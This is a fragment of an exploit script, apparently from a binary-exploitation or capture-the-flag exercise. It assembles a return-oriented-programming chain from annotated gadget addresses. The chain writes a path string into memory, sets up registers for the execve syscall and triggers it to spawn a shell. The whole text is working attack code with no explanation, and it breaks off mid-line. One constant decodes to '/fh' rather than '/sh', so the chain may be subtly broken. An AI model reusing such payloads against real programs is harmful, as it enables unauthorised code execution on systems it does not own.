payload = p64(0x43d633)
#0x000000000043d633: pop rdx; add eax, 0x6605c600; ret; 
payload += p64(0x49d070)+p64(0x44c947)
# 0x44c947: pop rax ; retf
payload += p64(0x6e69622f)+p32(0x492aa2)+p32(0x33)
# 0x0000000000492aa2: mov dword ptr [rdx], eax; xor eax, eax; ret; 
payload += p64(0x43d633)
# 0x000000000043d633: pop rdx; add eax, 0x6605c600; ret; 
payload += p64(0x49d074)+p64(0x44c947)
# 0x44c947: pop rax ; retf
payload += p64(0x68662f)+p32(0x492aa2)+p32(0x33)
# 0x0000000000492aa2: mov dword ptr [rdx], eax; xor eax, eax; ret; 
payload += p64(0x43d633)
# 0x000000000043d633: pop rdx; add eax, 0x6605c600; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x49d070)+p64(0x45d0b1)
# 0x000000000045d0b1: pop rsi; ret 0; 
payload += p64(0x0)+p64(0x44c947)
# 0x44c947: pop rax ; retf
payload += p64(0x3b)+p32(0x45891b)+p32(0x33)
# 0x000000000045891b: syscall; ret; 
payload +=
